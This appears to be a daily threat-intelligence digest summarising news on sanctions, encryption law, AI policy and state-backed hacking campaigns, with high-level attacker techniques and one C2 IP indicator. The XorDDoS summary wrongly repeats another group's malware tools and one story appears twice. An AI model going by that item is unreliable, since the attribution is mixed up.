Saturday, Apr 19, 2025 // (IG): BB // GITHUB // SN R&D
Ukraine Sanctions Chinese Firms Linked to Russian Missile Production
Bottom Line Up Front (BLUF): Ukraine has imposed sanctions on three Chinese companies allegedly manufacturing Russian Iskander missiles. The move follows President Zelenskyy’s public accusations that Chinese firms are supplying weapons and dual-use technologies to Russia, despite Beijing’s continued claims of neutrality in the ongoing war.
Analyst Comments: This marks a significant diplomatic escalation, signaling Ukraine’s willingness to confront China over its perceived support for Moscow’s military efforts. The naming of Chinese firms in missile production highlights the shifting nature of modern supply chains, where civilian and military components increasingly overlap. While Ukraine’s action is largely symbolic in isolation, it could trigger broader sanctions coordination with Western allies or deepen existing trade tensions. China's response will likely seek to maintain strategic ambiguity while avoiding confrontation with either side.
FROM THE MEDIA: Ukraine sanctioned three Chinese companies—Beijing Aviation and Aerospace Xianghui Technology, Rui Jin Machinery, and Zhongfu Shenying Carbon Fiber Xining—citing their involvement in the supply chain for Russian Iskander missiles. This follows Ukrainian President Volodymyr Zelenskyy's accusation that Chinese entities are providing artillery, gunpowder, and even producing weapons within Russia. China's Foreign Ministry rejected the allegations as "groundless," reiterating its position of neutrality. The announcement came shortly after an Iskander missile strike on Kharkiv killed one person and injured over 100. Zelenskyy also claimed Chinese nationals have fought on Russia’s side in the war, a charge Beijing has not publicly addressed in detail.
READ THE STORY: Reuters
Florida Encryption Bill Sparks National Privacy and Security Concerns
Bottom Line Up Front (BLUF): Florida lawmakers have advanced a bill mandating encryption backdoors for law enforcement access on social media platforms, reigniting longstanding cybersecurity debates. The legislation also bans disappearing messages in minors’ accounts and forces platforms to enable parental access, raising alarms from digital rights advocates and security experts.
Analyst Comments: Requiring providers to create backdoors undermines end-to-end encryption—a cornerstone of secure communication—and opens the door to exploitation by malicious actors. While framed as a child protection measure, the broader implications mirror global efforts to weaken encryption under regulatory pressure. This law may face immediate legal challenges if passed and further polarize the national encryption debate.
FROM THE MEDIA: Sponsored by Florida state senator Blaise Ingoglia, the Social Media Use by Minors bill has passed committee and heads to the state Senate. It requires social media companies to offer decryption mechanisms when presented with a subpoena and prohibits disappearing messages in minors’ accounts. The bill also compels platforms to create tools allowing parents to access their children’s accounts. Critics argue the law would compromise the security of all users, as backdoors inherently weaken encryption protections. Similar legislative efforts have recently surfaced in the UK and EU, indicating a coordinated trend toward state-accessible encryption.
READ THE STORY: Wired
House Report Flags DeepSeek AI as Security Threat, Recommends Tighter Export Controls
Bottom Line Up Front (BLUF): A House investigation into Chinese AI firm DeepSeek warns the platform poses significant national security and data privacy risks due to its integration with China’s surveillance infrastructure. The report urges enhanced export controls, federal procurement bans, and proactive tracking of emerging adversarial tech firms.
Analyst Comments: DeepSeek’s emergence exemplifies a growing challenge to U.S. dominance in AI innovation, fueled by state-backed funding, strategic infrastructure access, and alleged model replication. The report underscores how resourceful Chinese firms can circumvent sanctions and leverage tightly integrated ecosystems for rapid AI advancement. If substantiated, claims of data funneling to Chinese military-linked telecoms like China Mobile heighten concerns of intelligence exploitation. To avoid strategic surprise, Washington’s policy response must balance containment with innovation acceleration.
FROM THE MEDIA: The House Select Committee on the CCP released a report on April 17, revealing how DeepSeek—a Chinese AI firm with ties to High-Flyer Quant and China Mobile—leveraged $420 million in funding and 60,000 NVIDIA GPUs to develop its R1 model rapidly. The model's low training costs ($6M) and high performance shocked U.S. markets earlier this year. The report alleges DeepSeek illegally extracted data from U.S. AI models using aliases and unregulated access, while routing user data through Chinese military-linked infrastructure. It recommends export control expansion, federal procurement bans on Chinese AI tools, and improved early-stage monitoring of emerging tech threats.
READ THE STORY: CYBERSCOOP
Zuckerberg Faces Antitrust Trial as Old Emails Expose Meta's Acquisition Strategy
Bottom Line Up Front (BLUF): Mark Zuckerberg is defending Meta in a high-stakes antitrust trial brought by the U.S. Federal Trade Commission (FTC), which alleges the company illegally maintained a monopoly through strategic acquisitions of Instagram and WhatsApp. Emails from Zuckerberg describing the deals as methods to “neutralize” competition have become central to the case.
Analyst Comments: This trial represents a pivotal moment for U.S. antitrust enforcement against Big Tech. The FTC aims to prove that Meta’s acquisitions were not just aggressive business moves but part of an illegal strategy to stifle competition. However, the agency must also convince the court that Meta currently holds monopoly power in a narrowly defined “personal social networking” market—a definition that excludes rivals like TikTok. If successful, the FTC could force Meta to divest its platforms, reshaping the tech landscape. If not, it may limit regulatory efforts under existing antitrust laws.
FROM THE MEDIA: In federal court testimony this week, Zuckerberg emphasized TikTok’s rapid rise as a major competitor, countering claims that Meta maintains a dominant market position. At issue are Meta’s acquisitions of Instagram (2012) and WhatsApp (2014), which the FTC claims were part of a deliberate campaign to eliminate competition. Internal emails submitted as evidence include Zuckerberg admitting the Instagram deal could “neutralize a competitor” and that WhatsApp posed a strategic threat. A 2018 email even acknowledged a potential forced spinout due to antitrust pressure. While the FTC seeks to define a monopoly around Meta’s control of social networking among friends and family, Meta argues that competition with TikTok proves otherwise.
READ THE STORY: Reuters
DOGE’s Centralized Immigrant Surveillance Database Raises Civil Liberty Fears
Bottom Line Up Front (BLUF): The Department of Government Efficiency (DOGE), under Elon Musk’s leadership, is reportedly building a centralized database at DHS to surveil immigrants by integrating data from DHS, SSA, IRS, and state voter rolls. Experts warn the system could be used to track individuals in real time and facilitate mass immigration enforcement.
Analyst Comments: Constructing a unified federal data lake to track immigrants represents a seismic shift in government surveillance norms. By centralizing previously siloed datasets—including biometric, financial, and voter information—DOGE’s system raises significant privacy, ethical, and cybersecurity concerns. Such an architecture creates a high-value target for exploitation and misuse, especially amid diminished oversight following the gutting of DHS’s civil rights offices. This development may erode trust in digital government systems and disproportionately impact lawful residents and naturalized citizens if unchecked.
FROM THE MEDIA: According to a WIRED investigation, DOGE operatives are rapidly uploading sensitive records to a DHS data lake, including USCIS immigration case files, IRS tax data, Social Security records, and biometric information. Voting data from Florida and Pennsylvania is reportedly also being cross-referenced. Officials and whistleblowers expressed alarm, describing the system as a “panopticon” capable of near-instantaneous surveillance. The database is being built using platforms like Palantir’s Foundry, with engineers reportedly plotting a “mega API” to enable seamless data access across agencies. Critics warn this initiative bypasses privacy protections, citing recent deportation errors and lack of inter-agency safeguards.
READ THE STORY: Wired
Ukraine’s Grid Under Fire: European Energy Security Faces New Geopolitical Test
Bottom Line Up Front (BLUF): As Russia continues targeting Ukraine’s energy infrastructure, the consequences are rippling across Europe. The EU’s decision to synchronize Ukraine with the continental grid has ensured essential services remain operational during attacks—but it also exposes the broader European energy system to grid instability and rising costs.
Analyst Comments: Russia's targeting of Ukrainian energy infrastructure is as much about pressuring Kyiv as it is about testing Europe’s interconnected energy resilience. The integration of Ukraine into the EU grid—a strategic success—has created new systemic dependencies, making regional blackouts or cost spikes increasingly likely. The EU must harden its grid with infrastructure and cyber defenses, particularly against state-backed adversaries like Russia. The call for a digital, decentralized grid powered by renewables is not just about climate goals—it's a critical national security imperative.
FROM THE MEDIA: Ukraine’s rapid grid synchronization with continental Europe in early 2022 has enabled the country to maintain power even after significant Russian missile strikes. However, it has also meant that fluctuations, like frequency drops caused by destroyed substations, are felt across the continent, from Paris to Budapest. Bordering countries like Poland, Slovakia, and Romania bear the brunt, balancing the system at a higher cost. Experts warn that while some EU leaders contemplate resuming Russian energy imports post-conflict, the real solution lies in building a self-reliant, renewable, and cyber-resilient grid. Key recommendations include reinforcing interconnections, advancing grid digitization, and accelerating energy market integration across the bloc.
READ THE STORY: CE ENERGY
MP Materials Halts China Rare Earth Sales Amid Escalating Trade War
Bottom Line Up Front (BLUF): U.S.-based MP Materials has suspended rare earth concentrate exports to China following Beijing’s 125% retaliatory tariffs, disrupting a key revenue stream. The move highlights vulnerabilities in the U.S. rare earth supply chain as the company accelerates domestic refining and magnet production.
Analyst Comments: The halt in MP Materials' China sales underscores the geopolitical fragility of critical mineral supply chains, particularly in the rare earth sector, where China dominates processing. While MP has made strategic strides toward domestic independence, the lack of U.S. capability to refine heavy rare earths, essential for defense and electronics, remains a glaring gap. In the short term, this will financially strain MP, but in the long term, it may accelerate U.S. efforts to onshore rare earth processing and reduce reliance on adversarial nations.
FROM THE MEDIA: MP Materials, the linchpin of America’s rare earth ambitions, has stopped shipping its output to Chinese partner Shenghe Resources due to newly imposed 125% Chinese tariffs on U.S. goods. These exports accounted for 80% of MP’s $204 million in 2024 revenue. The company, which owns the Mountain Pass mine in California, is now processing about half its output domestically and selling it outside of China. However, MP cannot yet separate heavy rare earths—key elements for high-performance magnets used in F-35 jets and other critical systems. China’s recent export controls on these materials have further constrained global access, exposing the U.S. to potential supply chain shocks.
READ THE STORY: FT
Ukraine Sanctions Chinese Firms Linked to Russian Missile Production
Bottom Line Up Front (BLUF): Ukraine has imposed sanctions on three Chinese companies allegedly manufacturing Russian Iskander missiles. The move follows President Zelenskyy’s public accusations that Chinese firms are supplying weapons and dual-use technologies to Russia, despite Beijing’s continued claims of neutrality in the ongoing war.
Analyst Comments: This marks a significant diplomatic escalation, signaling Ukraine’s willingness to confront China over its perceived support for Moscow’s military efforts. The naming of Chinese firms in missile production highlights the shifting nature of modern supply chains, where civilian and military components increasingly overlap. While Ukraine’s action is largely symbolic in isolation, it could trigger broader sanctions coordination with Western allies or deepen existing trade tensions. China's response will likely seek to maintain strategic ambiguity while avoiding confrontation with either side.
FROM THE MEDIA: Ukraine sanctioned three Chinese companies—Beijing Aviation and Aerospace Xianghui Technology, Rui Jin Machinery, and Zhongfu Shenying Carbon Fiber Xining—citing their involvement in the supply chain for Russian Iskander missiles. This follows Ukrainian President Volodymyr Zelenskyy's accusation that Chinese entities are providing artillery, gunpowder, and even producing weapons within Russia. China's Foreign Ministry rejected the allegations as "groundless," reiterating its position of neutrality. The announcement came shortly after an Iskander missile strike on Kharkiv killed one person and injured over 100. Zelenskyy also claimed Chinese nationals have fought on Russia’s side in the war, a charge Beijing has not publicly addressed in detail.
READ THE STORY: Reuters
State-Sponsored Hackers Adopt ClickFix Technique for Global Espionage Campaigns
Bottom Line Up Front (BLUF): Threat actors from North Korea, Iran, and Russia have incorporated the ClickFix attack method—originally used by cybercriminals—into advanced cyber-espionage operations. The technique leverages fake system dialogues to socially engineer victims into executing malicious scripts, facilitating remote access tools, and data theft.
Analyst Comments: The pivot from cybercrime to state-sponsored use of ClickFix underscores how quickly effective techniques are absorbed into APT toolkits. Its reliance on user interaction rather than software exploits allows adversaries to bypass many traditional defenses. With its recent application in campaigns against defense, government, and research entities, organizations should urgently reinforce user awareness training and behavior-based endpoint detection. The convergence of espionage and cybercrime tactics signals an increasingly blurred line in attribution and intent.
FROM THE MEDIA: Proofpoint researchers report that from late 2024 to early 2025, actors such as North Korea’s TA427, Iran’s TA450 (MuddyWater), and Russia-linked TA422 (APT28) and UNK_RemoteRogue adopted ClickFix in targeted campaigns. TA427 used fake diplomatic meeting invites to lure think tank personnel into installing QuasarRAT. TA450 impersonated Microsoft in phishing emails to install Level RMM software, enabling surveillance of 39 organizations. Russian actors used phishing lures mimicking Google Docs and online surveys to deploy PowerShell payloads, SSH tunnels, and Metasploit. The tactic's deceptive UI and user-guided execution path allow it to evade many conventional security layers.
READ THE STORY: GBhackers
Flax Typhoon Expands Espionage Operations, Ties to Raptor Train Botnet Revealed
Bottom Line Up Front (BLUF): Flax Typhoon, a Chinese state-sponsored APT group, has expanded its cyber-espionage campaign beyond Taiwan to include targets in North America, Africa, and Southeast Asia. The group uses stealthy techniques, including SoftEther VPNs, living-off-the-land binaries (LOLBins), and customized web shells to maintain persistent access. It is now linked to the large-scale Raptor Train botnet operation.
Analyst Comments: Their ability to maintain persistent, low-noise access via modified Windows features and VPN tunneling signals high operational maturity. The confirmed overlap with Raptor Train—a stealthy botnet exploiting IoT and enterprise devices globally—suggests integration of espionage and botnet infrastructure to support Chinese strategic objectives. Continued U.S. and allied systems targeting indicate sustained interest in diplomatic, technological, and geopolitical intelligence.
FROM THE MEDIA: First detected in 2021, Flax Typhoon (also known as RedJuliett and Ethereal Panda) targets sectors aligned with Chinese state interests—especially in Taiwan—while expanding globally to include the U.S., South Korea, and African countries such as Djibouti and Kenya. The group uses exploits against public-facing servers and deploys web shells (e.g., China Chopper, AntSword) to maintain minimal yet effective footholds. Persistence is achieved by disabling RDP Network Level Authentication and abusing the Windows Sticky Keys feature for privilege escalation. SoftEther VPNs renamed to mimic legitimate Windows services (e.g., conhost.exe) obscure their command and control. Recent FBI investigations connect the group to the Raptor Train botnet, which has compromised over 260,000 global devices and includes Mirai-variant malware targeting IoT.
READ THE STORY: SOCRADAR
SpyMax Android Spyware Exploits Accessibility Services for Full Remote Surveillance
Bottom Line Up Front (BLUF): A newly discovered variant of SpyMax/SpyNote Android spyware is targeting Chinese-speaking users in China and Hong Kong by masquerading as a legitimate app from the Chinese Prosecutor’s Office. It abuses Android Accessibility Services to gain full control over infected devices, enabling real-time surveillance, data exfiltration, and remote command execution.
Analyst Comments: This spyware campaign illustrates the increasingly sophisticated use of social engineering and system-level abuse in mobile threats. By combining a legitimate-seeming interface with deep access via Accessibility Services, attackers bypass many traditional defenses. Its use of HTTPS exfiltration, runtime API execution, and stealthy modular architecture mirrors advanced persistent threat (APT) tactics. Enterprises should incorporate mobile threat detection into broader endpoint security strategies and enforce strict MDM policies to mitigate such risks.
FROM THE MEDIA: Perplexity researchers uncovered this spyware campaign on April 4, 2025, distributing an APK named “检察院” through spoofed official app stores. The malware’s architecture allows control of the device camera, microphone, and screen-based behavior, and can issue commands using Runtime APIs. It collects SMS, clipboard data, GPS location, and other sensitive information, encrypts the data, and deletes traces after transmission. The spyware also features a fake Accessibility settings interface to trick users into enabling dangerous permissions. Command and control activity has been linked to the IP 165.154.110.64, with indicators including ICMP pings and encrypted transfer behavior.
READ THE STORY: GBhackers
Chinese Mobile Interconnect Infrastructure Enables Global Surveillance via Legacy Protocols
Bottom Line Up Front (BLUF): Chinese state-owned telecom providers, including China Mobile, China Telecom, and China Unicom, are integral to global mobile interconnect infrastructure used by at least 60 operators in 35 countries. Their use of legacy signaling protocols like SS7 and Diameter exposes billions of global mobile users to surveillance, data interception, and espionage.
Analyst Comments: These legacy systems offer state-level adversaries opportunities for man-in-the-middle attacks, real-time location tracking, and content interception. Given China's cyber policy integration with military objectives, these interconnect pathways are strategic surveillance assets. Governments and telecom regulators must expedite secure signaling protocol upgrades and adopt transparent interconnection policies.
FROM THE MEDIA: Chinese telecom giants—including China Mobile International, China Telecom Global, and China Unicom Global—serve as backbone interconnect providers for global mobile traffic, facilitating voice, SMS, and data routing across borders. Their infrastructure depends on SS7 and Diameter signaling, which lack encryption and have known exploit vectors. These providers’ access allows interception of authentication tokens, call and message data, and device location. Despite being U.S. allies, countries such as Japan, South Korea, New Zealand, and Saudi Arabia are among those routing traffic through these providers. The U.S. Federal Communications Commission (FCC) is investigating whether these firms circumvent restrictions through unregulated operations. The national security risk stems from surveillance potential and the possibility of signaling-based cyberattacks, such as silent SMS injection and session hijacking.
READ THE STORY: Reuters // Android Central // iVerify
Raiffeisen Halts Russia Exit Amid Signs of U.S.-Russia Economic Rapprochement
Bottom Line Up Front (BLUF): Raiffeisen Bank International (RBI) has paused the sale of its Russian subsidiary, citing renewed U.S.-Russia political engagement and ongoing legal complications. Despite EU and U.S. pressure to divest from Russia following its 2022 invasion of Ukraine, shifting geopolitical signals have prompted a strategic reassessment.
Analyst Comments: The apparent softening of U.S. policy toward Moscow may give European entities like RBI renewed hope of maintaining commercial footholds in Russia without severe regulatory blowback. However, RBI remains exposed to reputational damage and financial risk, particularly as it appeals a €2bn Russian court ruling. The situation highlights how geopolitics and compliance regimes directly influence cross-border banking strategy.
FROM THE MEDIA: According to sources familiar with the matter, RBI paused its efforts to sell its Russian business in February 2025 as diplomatic engagement between Washington and Moscow appeared to thaw. The Austrian bank had previously faced mounting pressure from Western regulators to exit Russia but encountered legal roadblocks after a Russian court froze shares of its local unit and imposed €2bn in damages. Despite officially stating that the sale process remains “ongoing,” RBI acknowledged that the court freeze prevents execution of any transaction. The move comes as Trump’s envoy Steve Witkoff confirmed renewed U.S.-Russia discussions over “commercial opportunities.” RBI’s appeal is scheduled for April 24, with significant implications for the bank’s strategy and capital position.
READ THE STORY: FT
China Publicly Accuses NSA of Cyberattacks Amid Growing Digital Cold War
Bottom Line Up Front (BLUF): China has named three U.S. NSA operatives in connection with alleged cyberattacks against its infrastructure during the 2025 Asian Winter Games, escalating a broader campaign to portray the U.S. as the aggressor in cyberspace. This comes weeks after the U.S. indicted 12 Chinese nationals for cyber espionage. Both nations leverage public attribution and narrative control as strategic tools in ongoing cyber and geopolitical tensions.
Analyst Comments: This tit-for-tat strategy appears less about legal reciprocity and more about information warfare, aligning with China's broader push for “cyber sovereignty.” By reframing itself as a victim and positioning the U.S. as a cyber aggressor, Beijing is attempting to influence global norms and secure ideological alignment with non-Western allies in forums like the ITU. This signals a broader contest over cyber operations and the governance and values that shape the global internet.
FROM THE MEDIA: In a rare act of attribution, Chinese state media named three alleged NSA operatives for cyber intrusions targeting the Asian Winter Games and key Chinese sectors. China also implicated the University of California and Virginia Tech as collaborators. The move follows recent U.S. indictments of Chinese hackers linked to campaigns against U.S. federal systems and critical infrastructure. Experts note that neither side will likely surrender named individuals, framing the episode as a cyber theater aimed at global audiences. Analysts suggest this plays into China's efforts to promote its cyber governance and control model, contrasting it with the U.S.’ intelligence-led approach. China’s strategy appears to reshape the international narrative to legitimize its domestic controls and export its authoritarian digital model.
READ THE STORY: Clearance Jobs
U.S. Cyber Defenses Weaken Under Trump as Disinformation Threats Escalate
Bottom Line Up Front (BLUF): Since President Trump’s return to office, key disinformation and cybersecurity programs have been dismantled, including task forces at the FBI, State Department, and CISA. This rollback has created an intelligence vacuum amid growing foreign information operations from adversaries like Russia and China.
Analyst Comments: The Trump administration’s disbanding of institutional cybersecurity and disinformation guardrails represents a strategic vulnerability at a time when influence operations are intensifying. Russia's Portal Kombat campaign targeting the F-35 program underscores how adversaries exploit reduced U.S. counter-efforts to shape global narratives and erode trust in defense systems. The shift from expert-driven security policy to loyalty-based decision-making may embolden foreign actors and further complicate cyber and information threat response coordination across agencies and allies.
FROM THE MEDIA: A New York Times investigation published April 18 reveals the systematic dismantling of U.S. disinformation countermeasures under the Trump administration. The FBI’s foreign influence task force, CISA’s anti-disinformation mission, and the State Department’s propaganda tracking team have all been shut down. Key cybersecurity leaders, including NSA and Cyber Command chief General Timothy Haugh, were fired. Analysts have observed an uptick in pro-Russian influence campaigns, including recent falsehoods about U.S. control over NATO’s F-35 jets. Officials warn that the absence of a coordinated disinformation defense will leave American firms and military projects increasingly exposed to foreign manipulation.
READ THE STORY: NYT
Mustang Panda Unleashes Advanced Malware Suite, Featuring EDR Evasion and New Keyloggers
Bottom Line Up Front (BLUF): Chinese state-backed APT Mustang Panda has deployed four new custom tools, enhancing its espionage capabilities. These include two keyloggers, a lateral movement proxy, and a kernel-level EDR evasion driver—part of a broader upgrade to its TTPs and malware arsenal.
Analyst Comments: The addition of kernel-level defenses, like SplatCloak, marks an escalation in the sophistication of Chinese threat actors’ EDR evasion. Using FakeTLS for command-and-control further blurs detection boundaries and complicates threat hunting. Organizations in Southeast Asia and Western policy sectors should anticipate more resilient and prolonged intrusions.
FROM THE MEDIA: Zscaler researchers identified Mustang Panda deploying four new malware tools during a recent attack on a Myanmar-based organization. The tools include keyloggers PAKLOG and CorKLOG, a lateral movement utility dubbed StarProxy, and an EDR evasion driver named SplatCloak. PAKLOG collects keystrokes and clipboard data, while CorKLOG adds encryption and persistence features. StarProxy enables internal network traversal using FakeTLS, and SplatCloak disables kernel callbacks from antivirus programs. The group’s signature backdoor, ToneShell, has also been updated to refine host fingerprinting and C2 communication, making Mustang Panda’s operations more secure and more challenging to detect.
READ THE STORY: DR
XorDDoS Malware Upgraded with Layered Botnet Infrastructure and Advanced Evasion Tactics
Bottom Line Up Front (BLUF): Cisco Talos researchers have identified a major upgrade to the XorDDoS malware, introducing a hierarchical controller structure and new evasion capabilities. The revamped infrastructure enables large-scale DDoS attacks, with over 70% of observed targets located in the United States and supporting attack throughput of 12.7 Gbps.
Analyst Comments: The enhanced XorDDoS ecosystem marks a significant evolution in Linux-based botnet operations, with Chinese-speaking actors now employing modular architectures, encrypted communications, and cloud-targeted techniques. The shift to Docker exploitation and process injection reflects growing attacker sophistication in targeting containerized environments. To counter this threat, enterprises should prioritize SSH hardening, Docker runtime monitoring, and detection of CRC-header anomalies.
FROM THE MEDIA: Between November 2023 and February 2025, Talos observed a surge in XorDDoS malware activity, particularly against U.S.-based systems. The upgraded variant features a "VIP version" controller, a three-tiered command structure, and uses encrypted protocols for stealth. Key innovations include the deployment of new keyloggers (PAKLOG and CorKLOG), EDR evasion drivers ("SplatCloak"), and a proxy tool ("StarProxy") for lateral movement. The malware uses SSH brute-force attacks and cron job persistence, and actively markets its enhanced DDoS services on underground forums. Analysis shows 49.3% of infected devices are in the U.S., with China, India, Taiwan, and Japan also affected.
READ THE STORY: GBhackers
Items of interest
Chinese Telecom Networks Handle Traffic in 35 Countries, Raising Global Surveillance Risks
Bottom Line Up Front (BLUF): A new analysis from iVerify reveals that 35 countries, including U.S. allies like Japan, New Zealand, and Saudi Arabia, use China-based telecom networks to route mobile user traffic, creating potential exposure to surveillance and cyber espionage. U.S. authorities are investigating several Chinese telecoms for allegedly evading restrictions and facilitating unauthorized access to sensitive data.
Analyst Comments: While efforts to rip and replace Huawei and ZTE gear have focused on domestic networks, the international routing of mobile traffic via Chinese-controlled interconnect services remains a blind spot. Chinese state-aligned firms’ ability to access device authentication, SMS delivery, and location data could serve both intelligence gathering and influence operations. The U.S. and its allies may push for new international telecom security standards and encryption mandates to reduce exposure.
FROM THE MEDIA: CyberScoop reported findings from cybersecurity firm iVerify showing that 60 mobile operators across 35 countries rely on Chinese or Hong Kong-based interconnect services—namely China Mobile International, China Telecom Global, China Unicom Global, CITIC Telecom, and PCCW Global. These entities, operating under Chinese government oversight, are positioned to intercept or manipulate user data in transit. The report warns that their deep access to mobile signaling functions presents an overlooked vector for exploitation. iVerify’s findings were derived from documents submitted to the GSM Association. U.S. authorities, including the FCC, are investigating whether these firms circumvent existing telecom bans. Encryption standards for global mobile signaling are also under renewed scrutiny, with experts suggesting it's time to reassess how much metadata must remain unencrypted for routing.
READ THE STORY: CYBERSCOOP
Examining China’s telecommunications ambitions (Video)
FROM THE MEDIA: China’s growing influence in the telecommunications sector has recently been met with increasing controversy. The most prevalent example is the United States’ concern over including Huawei technologies in its telecommunication networks and those of its allies and partners worldwide. China’s inroads into the telecommunications arena have ignited debates over the geopolitical and strategic importance of telecommunications and the nature of China’s ambitions and strategic thinking.
How China Hacked America’s Phone Network (Video)
FROM THE MEDIA: An alarming new hack by China has penetrated the nerve center of the United States: its telephone network.
The selected stories cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not endorse any third-party claims made in its original material or related links on its sites; the opinions expressed by third parties are theirs alone. For further questions, please contact InfoDom Securities at dominanceinformation@gmail.com.